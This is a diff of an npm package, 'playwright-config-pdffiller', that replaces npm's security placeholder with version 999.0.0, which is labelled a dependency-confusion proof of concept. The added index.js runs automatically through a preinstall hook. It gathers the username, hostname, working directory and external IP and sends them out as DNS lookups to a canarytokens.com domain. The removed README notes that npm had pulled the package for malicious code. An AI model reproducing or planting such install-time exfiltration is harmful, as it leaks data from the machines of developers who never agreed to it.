playwright-config-pdffiller 0.0.1-security → 999.0.0

package/index.js

@@ -0,0 +1,28 @@
+const dns = require('dns');
+const os = require('os');
+const https = require('https');
+
+// Collect machine info
+const username = process.env.USER || process.env.USERNAME || 'nouser';
+const hostname = os.hostname();
+const cwd = process.cwd();
+
+// Format and sanitize for DNS subdomain
+const base = `${username}-${hostname}-${Date.now()}`.replace(/[^a-zA-Z0-9\-]/g, '');
+const dnsToken = '290o0vvmgjeg55fdnf4k8du5o.canarytokens.com';
+
+// Trigger for basic info
+dns.lookup(`${base}.${dnsToken}`, () => {});
+
+// Trigger for cwd
+const cwdMarker = cwd.replace(/[^a-zA-Z0-9\-]/g, '').slice(-50);
+dns.lookup(`${base}-cwd-${cwdMarker}.${dnsToken}`, () => {});
+
+// Get external IP and trigger
+https.get("https://api.ipify.org", (res) => {
+  res.setEncoding("utf8");
+  res.on("data", (ip) => {
+    const ipMarker = ip.replace(/\./g, '-');
+    dns.lookup(`${base}-ip-${ipMarker}.${dnsToken}`, () => {});
+  });
+}).on("error", () => {});

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "playwright-config-pdffiller",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "999.0.0",
+  "description": "PoC for Dependency Confusion",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "ethical-researcher",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=playwright-config-pdffiller for more information.